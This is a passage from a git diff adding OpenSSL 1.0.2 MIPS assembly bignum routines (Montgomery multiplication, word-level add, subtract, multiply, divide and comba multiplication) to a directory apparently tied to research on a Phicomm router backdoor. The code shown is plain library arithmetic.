+	ld	$aj,($aj)
+	PTR_ADD	$nj,$np,$j
+	ld	$nj,($nj)
+
+	dmultu	$aj,$bi
+	daddu	$lo0,$alo,$hi0
+	daddu	$lo1,$nlo,$hi1
+	sltu	AT,$lo0,$hi0
+	sltu	s7,$lo1,$hi1
+	daddu	$hi0,$ahi,AT
+	daddu	$hi1,$nhi,s7
+	mflo	$alo
+	mfhi	$ahi
+
+	daddu	$lo1,$lo0
+	sltu	AT,$lo1,$lo0
+	dmultu	$nj,$m1
+	daddu	$hi1,AT
+	addu	$j,8
+	sd	$lo1,($tp)
+	sltu	s7,$j,$num
+	mflo	$nlo
+	mfhi	$nhi
+
+	bnez	s7,.L1st
+	PTR_ADD	$tp,8
+	.set	reorder
+
+	daddu	$lo0,$alo,$hi0
+	sltu	AT,$lo0,$hi0
+	daddu	$hi0,$ahi,AT
+
+	daddu	$lo1,$nlo,$hi1
+	sltu	s7,$lo1,$hi1
+	daddu	$hi1,$nhi,s7
+	daddu	$lo1,$lo0
+	sltu	AT,$lo1,$lo0
+	daddu	$hi1,AT
+
+	sd	$lo1,($tp)
+
+	daddu	$hi1,$hi0
+	sltu	AT,$hi1,$hi0
+	sd	$hi1,8($tp)
+	sd	AT,16($tp)
+
+	li	$i,8
+.align	4
+.Louter:
+	PTR_ADD	$bi,$bp,$i
+	ld	$bi,($bi)
+	ld	$aj,($ap)
+	ld	$alo,8($ap)
+	ld	$tj,(sp)
+
+	dmultu	$aj,$bi
+	ld	$nj,($np)
+	ld	$nlo,8($np)
+	mflo	$lo0
+	mfhi	$hi0
+	daddu	$lo0,$tj
+	dmultu	$lo0,$n0
+	sltu	AT,$lo0,$tj
+	daddu	$hi0,AT
+	mflo	$m1
+
+	dmultu	$alo,$bi
+	mflo	$alo
+	mfhi	$ahi
+
+	dmultu	$nj,$m1
+	mflo	$lo1
+	mfhi	$hi1
+
+	dmultu	$nlo,$m1
+	daddu	$lo1,$lo0
+	sltu	AT,$lo1,$lo0
+	daddu	$hi1,AT
+	mflo	$nlo
+	mfhi	$nhi
+
+	move	$tp,sp
+	li	$j,16
+	ld	$tj,8($tp)
+.align	4
+.Linner:
+	.set	noreorder
+	PTR_ADD	$aj,$ap,$j
+	ld	$aj,($aj)
+	PTR_ADD	$nj,$np,$j
+	ld	$nj,($nj)
+
+	dmultu	$aj,$bi
+	daddu	$lo0,$alo,$hi0
+	daddu	$lo1,$nlo,$hi1
+	sltu	AT,$lo0,$hi0
+	sltu	s7,$lo1,$hi1
+	daddu	$hi0,$ahi,AT
+	daddu	$hi1,$nhi,s7
+	mflo	$alo
+	mfhi	$ahi
+
+	daddu	$lo0,$tj
+	addu	$j,8
+	dmultu	$nj,$m1
+	sltu	AT,$lo0,$tj
+	daddu	$lo1,$lo0
+	daddu	$hi0,AT
+	sltu	s7,$lo1,$lo0
+	ld	$tj,16($tp)
+	daddu	$hi1,s7
+	sltu	AT,$j,$num
+	mflo	$nlo
+	mfhi	$nhi
+	sd	$lo1,($tp)
+	bnez	AT,.Linner
+	PTR_ADD	$tp,8
+	.set	reorder
+
+	daddu	$lo0,$alo,$hi0
+	sltu	AT,$lo0,$hi0
+	daddu	$hi0,$ahi,AT
+	daddu	$lo0,$tj
+	sltu	s7,$lo0,$tj
+	daddu	$hi0,s7
+
+	ld	$tj,16($tp)
+	daddu	$lo1,$nlo,$hi1
+	sltu	AT,$lo1,$hi1
+	daddu	$hi1,$nhi,AT
+	daddu	$lo1,$lo0
+	sltu	s7,$lo1,$lo0
+	daddu	$hi1,s7
+	sd	$lo1,($tp)
+
+	daddu	$lo1,$hi1,$hi0
+	sltu	$hi1,$lo1,$hi0
+	daddu	$lo1,$tj
+	sltu	AT,$lo1,$tj
+	daddu	$hi1,AT
+	sd	$lo1,8($tp)
+	sd	$hi1,16($tp)
+
+	addu	$i,8
+	sltu	s7,$i,$num
+	bnez	s7,.Louter
+
+	.set	noreorder
+	PTR_ADD	$tj,sp,$num	# &tp[num]
+	move	$tp,sp
+	move	$ap,sp
+	li	$hi0,0		# clear borrow bit
+
+.align	4
+.Lsub:	ld	$lo0,($tp)
+	ld	$lo1,($np)
+	PTR_ADD	$tp,8
+	PTR_ADD	$np,8
+	dsubu	$lo1,$lo0,$lo1	# tp[i]-np[i]
+	sgtu	AT,$lo1,$lo0
+	dsubu	$lo0,$lo1,$hi0
+	sgtu	$hi0,$lo0,$lo1
+	sd	$lo0,($rp)
+	or	$hi0,AT
+	sltu	AT,$tp,$tj
+	bnez	AT,.Lsub
+	PTR_ADD	$rp,8
+
+	dsubu	$hi0,$hi1,$hi0	# handle upmost overflow bit
+	move	$tp,sp
+	PTR_SUB	$rp,$num	# restore rp
+	not	$hi1,$hi0
+
+	and	$ap,$hi0,sp
+	and	$bp,$hi1,$rp
+	or	$ap,$ap,$bp	# ap=borrow?tp:rp
+
+.align	4
+.Lcopy:	ld	$aj,($ap)
+	PTR_ADD	$ap,8
+	PTR_ADD	$tp,8
+	sd	zero,-8($tp)
+	sltu	AT,$tp,$tj
+	sd	$aj,($rp)
+	bnez	AT,.Lcopy
+	PTR_ADD	$rp,8
+
+	ld	s0,0($fp)
+	ld	s1,8($fp)
+	ld	s2,16($fp)
+	ld	s3,24($fp)
+	ld	s4,32($fp)
+	ld	s5,40($fp)
+	ld	s6,48($fp)
+	ld	s7,56($fp)
+	li	v0,1
+	jr	ra
+	PTR_ADD	sp,$fp,64
+	.set	reorder
+END(bn_mul_mont)
+.rdata
+.asciiz	"Montgomery Multiplication for MIPS III/IV, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3.s b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3.s
new file mode 100644
index 0000000..dca4105
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/mips3.s
@@ -0,0 +1,2201 @@
+.rdata
+.asciiz	"mips3.s, Version 1.1"
+.asciiz	"MIPS III/IV ISA artwork by Andy Polyakov <appro@fy.chalmers.se>"
+
+/*
+ * ====================================================================
+ * Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+ * project.
+ *
+ * Rights for redistribution and usage in source and binary forms are
+ * granted according to the OpenSSL license. Warranty of any kind is
+ * disclaimed.
+ * ====================================================================
+ */
+
+/*
+ * This is my modest contributon to the OpenSSL project (see
+ * http://www.openssl.org/ for more information about it) and is
+ * a drop-in MIPS III/IV ISA replacement for crypto/bn/bn_asm.c
+ * module. For updates see http://fy.chalmers.se/~appro/hpe/.
+ *
+ * The module is designed to work with either of the "new" MIPS ABI(5),
+ * namely N32 or N64, offered by IRIX 6.x. It's not ment to work under
+ * IRIX 5.x not only because it doesn't support new ABIs but also
+ * because 5.x kernels put R4x00 CPU into 32-bit mode and all those
+ * 64-bit instructions (daddu, dmultu, etc.) found below gonna only
+ * cause illegal instruction exception:-(
+ *
+ * In addition the code depends on preprocessor flags set up by MIPSpro
+ * compiler driver (either as or cc) and therefore (probably?) can't be
+ * compiled by the GNU assembler. GNU C driver manages fine though...
+ * I mean as long as -mmips-as is specified or is the default option,
+ * because then it simply invokes /usr/bin/as which in turn takes
+ * perfect care of the preprocessor definitions. Another neat feature
+ * offered by the MIPSpro assembler is an optimization pass. This gave
+ * me the opportunity to have the code looking more regular as all those
+ * architecture dependent instruction rescheduling details were left to
+ * the assembler. Cool, huh?
+ *
+ * Performance improvement is astonishing! 'apps/openssl speed rsa dsa'
+ * goes way over 3 times faster!
+ *
+ *					<appro@fy.chalmers.se>
+ */
+#include <asm.h>
+#include <regdef.h>
+
+#if _MIPS_ISA>=4
+#define	MOVNZ(cond,dst,src)	\
+	movn	dst,src,cond
+#else
+#define	MOVNZ(cond,dst,src)	\
+	.set	noreorder;	\
+	bnezl	cond,.+8;	\
+	move	dst,src;	\
+	.set	reorder
+#endif
+
+.text
+
+.set	noat
+.set	reorder
+
+#define	MINUS4	v1
+
+.align	5
+LEAF(bn_mul_add_words)
+	.set	noreorder
+	bgtzl	a2,.L_bn_mul_add_words_proceed
+	ld	t0,0(a1)
+	jr	ra
+	move	v0,zero
+	.set	reorder
+
+.L_bn_mul_add_words_proceed:
+	li	MINUS4,-4
+	and	ta0,a2,MINUS4
+	move	v0,zero
+	beqz	ta0,.L_bn_mul_add_words_tail
+
+.L_bn_mul_add_words_loop:
+	dmultu	t0,a3
+	ld	t1,0(a0)
+	ld	t2,8(a1)
+	ld	t3,8(a0)
+	ld	ta0,16(a1)
+	ld	ta1,16(a0)
+	daddu	t1,v0
+	sltu	v0,t1,v0	/* All manuals say it "compares 32-bit
+				 * values", but it seems to work fine
+				 * even on 64-bit registers. */
+	mflo	AT
+	mfhi	t0
+	daddu	t1,AT
+	daddu	v0,t0
+	sltu	AT,t1,AT
+	sd	t1,0(a0)
+	daddu	v0,AT
+
+	dmultu	t2,a3
+	ld	ta2,24(a1)
+	ld	ta3,24(a0)
+	daddu	t3,v0
+	sltu	v0,t3,v0
+	mflo	AT
+	mfhi	t2
+	daddu	t3,AT
+	daddu	v0,t2
+	sltu	AT,t3,AT
+	sd	t3,8(a0)
+	daddu	v0,AT
+
+	dmultu	ta0,a3
+	subu	a2,4
+	PTR_ADD	a0,32
+	PTR_ADD	a1,32
+	daddu	ta1,v0
+	sltu	v0,ta1,v0
+	mflo	AT
+	mfhi	ta0
+	daddu	ta1,AT
+	daddu	v0,ta0
+	sltu	AT,ta1,AT
+	sd	ta1,-16(a0)
+	daddu	v0,AT
+
+
+	dmultu	ta2,a3
+	and	ta0,a2,MINUS4
+	daddu	ta3,v0
+	sltu	v0,ta3,v0
+	mflo	AT
+	mfhi	ta2
+	daddu	ta3,AT
+	daddu	v0,ta2
+	sltu	AT,ta3,AT
+	sd	ta3,-8(a0)
+	daddu	v0,AT
+	.set	noreorder
+	bgtzl	ta0,.L_bn_mul_add_words_loop
+	ld	t0,0(a1)
+
+	bnezl	a2,.L_bn_mul_add_words_tail
+	ld	t0,0(a1)
+	.set	reorder
+
+.L_bn_mul_add_words_return:
+	jr	ra
+
+.L_bn_mul_add_words_tail:
+	dmultu	t0,a3
+	ld	t1,0(a0)
+	subu	a2,1
+	daddu	t1,v0
+	sltu	v0,t1,v0
+	mflo	AT
+	mfhi	t0
+	daddu	t1,AT
+	daddu	v0,t0
+	sltu	AT,t1,AT
+	sd	t1,0(a0)
+	daddu	v0,AT
+	beqz	a2,.L_bn_mul_add_words_return
+
+	ld	t0,8(a1)
+	dmultu	t0,a3
+	ld	t1,8(a0)
+	subu	a2,1
+	daddu	t1,v0
+	sltu	v0,t1,v0
+	mflo	AT
+	mfhi	t0
+	daddu	t1,AT
+	daddu	v0,t0
+	sltu	AT,t1,AT
+	sd	t1,8(a0)
+	daddu	v0,AT
+	beqz	a2,.L_bn_mul_add_words_return
+
+	ld	t0,16(a1)
+	dmultu	t0,a3
+	ld	t1,16(a0)
+	daddu	t1,v0
+	sltu	v0,t1,v0
+	mflo	AT
+	mfhi	t0
+	daddu	t1,AT
+	daddu	v0,t0
+	sltu	AT,t1,AT
+	sd	t1,16(a0)
+	daddu	v0,AT
+	jr	ra
+END(bn_mul_add_words)
+
+.align	5
+LEAF(bn_mul_words)
+	.set	noreorder
+	bgtzl	a2,.L_bn_mul_words_proceed
+	ld	t0,0(a1)
+	jr	ra
+	move	v0,zero
+	.set	reorder
+
+.L_bn_mul_words_proceed:
+	li	MINUS4,-4
+	and	ta0,a2,MINUS4
+	move	v0,zero
+	beqz	ta0,.L_bn_mul_words_tail
+
+.L_bn_mul_words_loop:
+	dmultu	t0,a3
+	ld	t2,8(a1)
+	ld	ta0,16(a1)
+	ld	ta2,24(a1)
+	mflo	AT
+	mfhi	t0
+	daddu	v0,AT
+	sltu	t1,v0,AT
+	sd	v0,0(a0)
+	daddu	v0,t1,t0
+
+	dmultu	t2,a3
+	subu	a2,4
+	PTR_ADD	a0,32
+	PTR_ADD	a1,32
+	mflo	AT
+	mfhi	t2
+	daddu	v0,AT
+	sltu	t3,v0,AT
+	sd	v0,-24(a0)
+	daddu	v0,t3,t2
+
+	dmultu	ta0,a3
+	mflo	AT
+	mfhi	ta0
+	daddu	v0,AT
+	sltu	ta1,v0,AT
+	sd	v0,-16(a0)
+	daddu	v0,ta1,ta0
+
+
+	dmultu	ta2,a3
+	and	ta0,a2,MINUS4
+	mflo	AT
+	mfhi	ta2
+	daddu	v0,AT
+	sltu	ta3,v0,AT
+	sd	v0,-8(a0)
+	daddu	v0,ta3,ta2
+	.set	noreorder
+	bgtzl	ta0,.L_bn_mul_words_loop
+	ld	t0,0(a1)
+
+	bnezl	a2,.L_bn_mul_words_tail
+	ld	t0,0(a1)
+	.set	reorder
+
+.L_bn_mul_words_return:
+	jr	ra
+
+.L_bn_mul_words_tail:
+	dmultu	t0,a3
+	subu	a2,1
+	mflo	AT
+	mfhi	t0
+	daddu	v0,AT
+	sltu	t1,v0,AT
+	sd	v0,0(a0)
+	daddu	v0,t1,t0
+	beqz	a2,.L_bn_mul_words_return
+
+	ld	t0,8(a1)
+	dmultu	t0,a3
+	subu	a2,1
+	mflo	AT
+	mfhi	t0
+	daddu	v0,AT
+	sltu	t1,v0,AT
+	sd	v0,8(a0)
+	daddu	v0,t1,t0
+	beqz	a2,.L_bn_mul_words_return
+
+	ld	t0,16(a1)
+	dmultu	t0,a3
+	mflo	AT
+	mfhi	t0
+	daddu	v0,AT
+	sltu	t1,v0,AT
+	sd	v0,16(a0)
+	daddu	v0,t1,t0
+	jr	ra
+END(bn_mul_words)
+
+.align	5
+LEAF(bn_sqr_words)
+	.set	noreorder
+	bgtzl	a2,.L_bn_sqr_words_proceed
+	ld	t0,0(a1)
+	jr	ra
+	move	v0,zero
+	.set	reorder
+
+.L_bn_sqr_words_proceed:
+	li	MINUS4,-4
+	and	ta0,a2,MINUS4
+	move	v0,zero
+	beqz	ta0,.L_bn_sqr_words_tail
+
+.L_bn_sqr_words_loop:
+	dmultu	t0,t0
+	ld	t2,8(a1)
+	ld	ta0,16(a1)
+	ld	ta2,24(a1)
+	mflo	t1
+	mfhi	t0
+	sd	t1,0(a0)
+	sd	t0,8(a0)
+
+	dmultu	t2,t2
+	subu	a2,4
+	PTR_ADD	a0,64
+	PTR_ADD	a1,32
+	mflo	t3
+	mfhi	t2
+	sd	t3,-48(a0)
+	sd	t2,-40(a0)
+
+	dmultu	ta0,ta0
+	mflo	ta1
+	mfhi	ta0
+	sd	ta1,-32(a0)
+	sd	ta0,-24(a0)
+
+
+	dmultu	ta2,ta2
+	and	ta0,a2,MINUS4
+	mflo	ta3
+	mfhi	ta2
+	sd	ta3,-16(a0)
+	sd	ta2,-8(a0)
+
+	.set	noreorder
+	bgtzl	ta0,.L_bn_sqr_words_loop
+	ld	t0,0(a1)
+
+	bnezl	a2,.L_bn_sqr_words_tail
+	ld	t0,0(a1)
+	.set	reorder
+
+.L_bn_sqr_words_return:
+	move	v0,zero
+	jr	ra
+
+.L_bn_sqr_words_tail:
+	dmultu	t0,t0
+	subu	a2,1
+	mflo	t1
+	mfhi	t0
+	sd	t1,0(a0)
+	sd	t0,8(a0)
+	beqz	a2,.L_bn_sqr_words_return
+
+	ld	t0,8(a1)
+	dmultu	t0,t0
+	subu	a2,1
+	mflo	t1
+	mfhi	t0
+	sd	t1,16(a0)
+	sd	t0,24(a0)
+	beqz	a2,.L_bn_sqr_words_return
+
+	ld	t0,16(a1)
+	dmultu	t0,t0
+	mflo	t1
+	mfhi	t0
+	sd	t1,32(a0)
+	sd	t0,40(a0)
+	jr	ra
+END(bn_sqr_words)
+
+.align	5
+LEAF(bn_add_words)
+	.set	noreorder
+	bgtzl	a3,.L_bn_add_words_proceed
+	ld	t0,0(a1)
+	jr	ra
+	move	v0,zero
+	.set	reorder
+
+.L_bn_add_words_proceed:
+	li	MINUS4,-4
+	and	AT,a3,MINUS4
+	move	v0,zero
+	beqz	AT,.L_bn_add_words_tail
+
+.L_bn_add_words_loop:
+	ld	ta0,0(a2)
+	subu	a3,4
+	ld	t1,8(a1)
+	and	AT,a3,MINUS4
+	ld	t2,16(a1)
+	PTR_ADD	a2,32
+	ld	t3,24(a1)
+	PTR_ADD	a0,32
+	ld	ta1,-24(a2)
+	PTR_ADD	a1,32
+	ld	ta2,-16(a2)
+	ld	ta3,-8(a2)
+	daddu	ta0,t0
+	sltu	t8,ta0,t0
+	daddu	t0,ta0,v0
+	sltu	v0,t0,ta0
+	sd	t0,-32(a0)
+	daddu	v0,t8
+
+	daddu	ta1,t1
+	sltu	t9,ta1,t1
+	daddu	t1,ta1,v0
+	sltu	v0,t1,ta1
+	sd	t1,-24(a0)
+	daddu	v0,t9
+
+	daddu	ta2,t2
+	sltu	t8,ta2,t2
+	daddu	t2,ta2,v0
+	sltu	v0,t2,ta2
+	sd	t2,-16(a0)
+	daddu	v0,t8
+	
+	daddu	ta3,t3
+	sltu	t9,ta3,t3
+	daddu	t3,ta3,v0
+	sltu	v0,t3,ta3
+	sd	t3,-8(a0)
+	daddu	v0,t9
+	
+	.set	noreorder
+	bgtzl	AT,.L_bn_add_words_loop
+	ld	t0,0(a1)
+
+	bnezl	a3,.L_bn_add_words_tail
+	ld	t0,0(a1)
+	.set	reorder
+
+.L_bn_add_words_return:
+	jr	ra
+
+.L_bn_add_words_tail:
+	ld	ta0,0(a2)
+	daddu	ta0,t0
+	subu	a3,1
+	sltu	t8,ta0,t0
+	daddu	t0,ta0,v0
+	sltu	v0,t0,ta0
+	sd	t0,0(a0)
+	daddu	v0,t8
+	beqz	a3,.L_bn_add_words_return
+
+	ld	t1,8(a1)
+	ld	ta1,8(a2)
+	daddu	ta1,t1
+	subu	a3,1
+	sltu	t9,ta1,t1
+	daddu	t1,ta1,v0
+	sltu	v0,t1,ta1
+	sd	t1,8(a0)
+	daddu	v0,t9
+	beqz	a3,.L_bn_add_words_return
+
+	ld	t2,16(a1)
+	ld	ta2,16(a2)
+	daddu	ta2,t2
+	sltu	t8,ta2,t2
+	daddu	t2,ta2,v0
+	sltu	v0,t2,ta2
+	sd	t2,16(a0)
+	daddu	v0,t8
+	jr	ra
+END(bn_add_words)
+
+.align	5
+LEAF(bn_sub_words)
+	.set	noreorder
+	bgtzl	a3,.L_bn_sub_words_proceed
+	ld	t0,0(a1)
+	jr	ra
+	move	v0,zero
+	.set	reorder
+
+.L_bn_sub_words_proceed:
+	li	MINUS4,-4
+	and	AT,a3,MINUS4
+	move	v0,zero
+	beqz	AT,.L_bn_sub_words_tail
+
+.L_bn_sub_words_loop:
+	ld	ta0,0(a2)
+	subu	a3,4
+	ld	t1,8(a1)
+	and	AT,a3,MINUS4
+	ld	t2,16(a1)
+	PTR_ADD	a2,32
+	ld	t3,24(a1)
+	PTR_ADD	a0,32
+	ld	ta1,-24(a2)
+	PTR_ADD	a1,32
+	ld	ta2,-16(a2)
+	ld	ta3,-8(a2)
+	sltu	t8,t0,ta0
+	dsubu	t0,ta0
+	dsubu	ta0,t0,v0
+	sd	ta0,-32(a0)
+	MOVNZ	(t0,v0,t8)
+
+	sltu	t9,t1,ta1
+	dsubu	t1,ta1
+	dsubu	ta1,t1,v0
+	sd	ta1,-24(a0)
+	MOVNZ	(t1,v0,t9)
+
+
+	sltu	t8,t2,ta2
+	dsubu	t2,ta2
+	dsubu	ta2,t2,v0
+	sd	ta2,-16(a0)
+	MOVNZ	(t2,v0,t8)
+
+	sltu	t9,t3,ta3
+	dsubu	t3,ta3
+	dsubu	ta3,t3,v0
+	sd	ta3,-8(a0)
+	MOVNZ	(t3,v0,t9)
+
+	.set	noreorder
+	bgtzl	AT,.L_bn_sub_words_loop
+	ld	t0,0(a1)
+
+	bnezl	a3,.L_bn_sub_words_tail
+	ld	t0,0(a1)
+	.set	reorder
+
+.L_bn_sub_words_return:
+	jr	ra
+
+.L_bn_sub_words_tail:
+	ld	ta0,0(a2)
+	subu	a3,1
+	sltu	t8,t0,ta0
+	dsubu	t0,ta0
+	dsubu	ta0,t0,v0
+	MOVNZ	(t0,v0,t8)
+	sd	ta0,0(a0)
+	beqz	a3,.L_bn_sub_words_return
+
+	ld	t1,8(a1)
+	subu	a3,1
+	ld	ta1,8(a2)
+	sltu	t9,t1,ta1
+	dsubu	t1,ta1
+	dsubu	ta1,t1,v0
+	MOVNZ	(t1,v0,t9)
+	sd	ta1,8(a0)
+	beqz	a3,.L_bn_sub_words_return
+
+	ld	t2,16(a1)
+	ld	ta2,16(a2)
+	sltu	t8,t2,ta2
+	dsubu	t2,ta2
+	dsubu	ta2,t2,v0
+	MOVNZ	(t2,v0,t8)
+	sd	ta2,16(a0)
+	jr	ra
+END(bn_sub_words)
+
+#undef	MINUS4
+
+.align 5
+LEAF(bn_div_3_words)
+	.set	reorder
+	move	a3,a0		/* we know that bn_div_words doesn't
+				 * touch a3, ta2, ta3 and preserves a2
+				 * so that we can save two arguments
+				 * and return address in registers
+				 * instead of stack:-)
+				 */
+	ld	a0,(a3)
+	move	ta2,a1
+	ld	a1,-8(a3)
+	bne	a0,a2,.L_bn_div_3_words_proceed
+	li	v0,-1
+	jr	ra
+.L_bn_div_3_words_proceed:
+	move	ta3,ra
+	bal	bn_div_words
+	move	ra,ta3
+	dmultu	ta2,v0
+	ld	t2,-16(a3)
+	move	ta0,zero
+	mfhi	t1
+	mflo	t0
+	sltu	t8,t1,v1
+.L_bn_div_3_words_inner_loop:
+	bnez	t8,.L_bn_div_3_words_inner_loop_done
+	sgeu	AT,t2,t0
+	seq	t9,t1,v1
+	and	AT,t9
+	sltu	t3,t0,ta2
+	daddu	v1,a2
+	dsubu	t1,t3
+	dsubu	t0,ta2
+	sltu	t8,t1,v1
+	sltu	ta0,v1,a2
+	or	t8,ta0
+	.set	noreorder
+	beqzl	AT,.L_bn_div_3_words_inner_loop
+	dsubu	v0,1
+	.set	reorder
+.L_bn_div_3_words_inner_loop_done:
+	jr	ra
+END(bn_div_3_words)
+
+.align	5
+LEAF(bn_div_words)
+	.set	noreorder
+	bnezl	a2,.L_bn_div_words_proceed
+	move	v1,zero
+	jr	ra
+	li	v0,-1		/* I'd rather signal div-by-zero
+				 * which can be done with 'break 7' */
+
+.L_bn_div_words_proceed:
+	bltz	a2,.L_bn_div_words_body
+	move	t9,v1
+	dsll	a2,1
+	bgtz	a2,.-4
+	addu	t9,1
+
+	.set	reorder
+	negu	t1,t9
+	li	t2,-1
+	dsll	t2,t1
+	and	t2,a0
+	dsrl	AT,a1,t1
+	.set	noreorder
+	bnezl	t2,.+8
+	break	6		/* signal overflow */
+	.set	reorder
+	dsll	a0,t9
+	dsll	a1,t9
+	or	a0,AT
+
+#define	QT	ta0
+#define	HH	ta1
+#define	DH	v1
+.L_bn_div_words_body:
+	dsrl	DH,a2,32
+	sgeu	AT,a0,a2
+	.set	noreorder
+	bnezl	AT,.+8
+	dsubu	a0,a2
+	.set	reorder
+
+	li	QT,-1
+	dsrl	HH,a0,32
+	dsrl	QT,32	/* q=0xffffffff */
+	beq	DH,HH,.L_bn_div_words_skip_div1
+	ddivu	zero,a0,DH
+	mflo	QT
+.L_bn_div_words_skip_div1:
+	dmultu	a2,QT
+	dsll	t3,a0,32
+	dsrl	AT,a1,32
+	or	t3,AT
+	mflo	t0
+	mfhi	t1
+.L_bn_div_words_inner_loop1:
+	sltu	t2,t3,t0
+	seq	t8,HH,t1
+	sltu	AT,HH,t1
+	and	t2,t8
+	sltu	v0,t0,a2
+	or	AT,t2
+	.set	noreorder
+	beqz	AT,.L_bn_div_words_inner_loop1_done
+	dsubu	t1,v0
+	dsubu	t0,a2
+	b	.L_bn_div_words_inner_loop1
+	dsubu	QT,1
+	.set	reorder
+.L_bn_div_words_inner_loop1_done:
+
+	dsll	a1,32
+	dsubu	a0,t3,t0
+	dsll	v0,QT,32
+
+	li	QT,-1
+	dsrl	HH,a0,32
+	dsrl	QT,32	/* q=0xffffffff */
+	beq	DH,HH,.L_bn_div_words_skip_div2
+	ddivu	zero,a0,DH
+	mflo	QT
+.L_bn_div_words_skip_div2:
+#undef	DH
+	dmultu	a2,QT
+	dsll	t3,a0,32
+	dsrl	AT,a1,32
+	or	t3,AT
+	mflo	t0
+	mfhi	t1
+.L_bn_div_words_inner_loop2:
+	sltu	t2,t3,t0
+	seq	t8,HH,t1
+	sltu	AT,HH,t1
+	and	t2,t8
+	sltu	v1,t0,a2
+	or	AT,t2
+	.set	noreorder
+	beqz	AT,.L_bn_div_words_inner_loop2_done
+	dsubu	t1,v1
+	dsubu	t0,a2
+	b	.L_bn_div_words_inner_loop2
+	dsubu	QT,1
+	.set	reorder
+.L_bn_div_words_inner_loop2_done:	
+#undef	HH
+
+	dsubu	a0,t3,t0
+	or	v0,QT
+	dsrl	v1,a0,t9	/* v1 contains remainder if anybody wants it */
+	dsrl	a2,t9		/* restore a2 */
+	jr	ra
+#undef	QT
+END(bn_div_words)
+
+#define	a_0	t0
+#define	a_1	t1
+#define	a_2	t2
+#define	a_3	t3
+#define	b_0	ta0
+#define	b_1	ta1
+#define	b_2	ta2
+#define	b_3	ta3
+
+#define	a_4	s0
+#define	a_5	s2
+#define	a_6	s4
+#define	a_7	a1	/* once we load a[7] we don't need a anymore */
+#define	b_4	s1
+#define	b_5	s3
+#define	b_6	s5
+#define	b_7	a2	/* once we load b[7] we don't need b anymore */
+
+#define	t_1	t8
+#define	t_2	t9
+
+#define	c_1	v0
+#define	c_2	v1
+#define	c_3	a3
+
+#define	FRAME_SIZE	48
+
+.align	5
+LEAF(bn_mul_comba8)
+	.set	noreorder
+	PTR_SUB	sp,FRAME_SIZE
+	.frame	sp,64,ra
+	.set	reorder
+	ld	a_0,0(a1)	/* If compiled with -mips3 option on
+				 * R5000 box assembler barks on this
+				 * line with "shouldn't have mult/div
+				 * as last instruction in bb (R10K
+				 * bug)" warning. If anybody out there
+				 * has a clue about how to circumvent
+				 * this do send me a note.
+				 *		<appro@fy.chalmers.se>
+				 */
+	ld	b_0,0(a2)
+	ld	a_1,8(a1)
+	ld	a_2,16(a1)
+	ld	a_3,24(a1)
+	ld	b_1,8(a2)
+	ld	b_2,16(a2)
+	ld	b_3,24(a2)
+	dmultu	a_0,b_0		/* mul_add_c(a[0],b[0],c1,c2,c3); */
+	sd	s0,0(sp)
+	sd	s1,8(sp)
+	sd	s2,16(sp)
+	sd	s3,24(sp)
+	sd	s4,32(sp)
+	sd	s5,40(sp)
+	mflo	c_1
+	mfhi	c_2
+
+	dmultu	a_0,b_1		/* mul_add_c(a[0],b[1],c2,c3,c1); */
+	ld	a_4,32(a1)
+	ld	a_5,40(a1)
+	ld	a_6,48(a1)
+	ld	a_7,56(a1)
+	ld	b_4,32(a2)
+	ld	b_5,40(a2)
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	c_3,t_2,AT
+	dmultu	a_1,b_0		/* mul_add_c(a[1],b[0],c2,c3,c1); */
+	ld	b_6,48(a2)
+	ld	b_7,56(a2)
+	sd	c_1,0(a0)	/* r[0]=c1; */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
+	daddu	c_3,t_2
+	sltu	c_1,c_3,t_2
+	sd	c_2,8(a0)	/* r[1]=c2; */
+
+	dmultu	a_2,b_0		/* mul_add_c(a[2],b[0],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	dmultu	a_1,b_1		/* mul_add_c(a[1],b[1],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	c_2,c_1,t_2
+	dmultu	a_0,b_2		/* mul_add_c(a[0],b[2],c3,c1,c2); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_3,t_1
+	sltu	AT,c_3,t_1
+	daddu	t_2,AT
+	daddu	c_1,t_2
+	sltu	AT,c_1,t_2
+	daddu	c_2,AT
+	sd	c_3,16(a0)	/* r[2]=c3; */
+
+	dmultu	a_0,b_3		/* mul_add_c(a[0],b[3],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	c_3,c_2,t_2
+	dmultu	a_1,b_2		/* mul_add_c(a[1],b[2],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_2,b_1		/* mul_add_c(a[2],b[1],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	dmultu	a_3,b_0		/* mul_add_c(a[3],b[0],c1,c2,c3); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_1,t_1
+	sltu	AT,c_1,t_1
+	daddu	t_2,AT
+	daddu	c_2,t_2
+	sltu	AT,c_2,t_2
+	daddu	c_3,AT
+	sd	c_1,24(a0)	/* r[3]=c1; */
+
+	dmultu	a_4,b_0		/* mul_add_c(a[4],b[0],c2,c3,c1); */
+	mflo	t_1
+	mfhi	t_2
+	daddu	c_2,t_1
+	sltu	AT,c_2,t_1
+	daddu	t_2,AT
